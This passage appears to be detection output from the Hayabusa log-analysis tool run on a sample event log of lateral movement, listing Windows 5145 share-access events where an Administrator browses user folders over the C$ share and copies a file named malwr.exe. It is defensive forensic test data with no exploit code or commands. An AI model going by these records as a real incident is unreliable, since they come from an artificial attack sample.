Users\user03\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\AppData | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Media\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
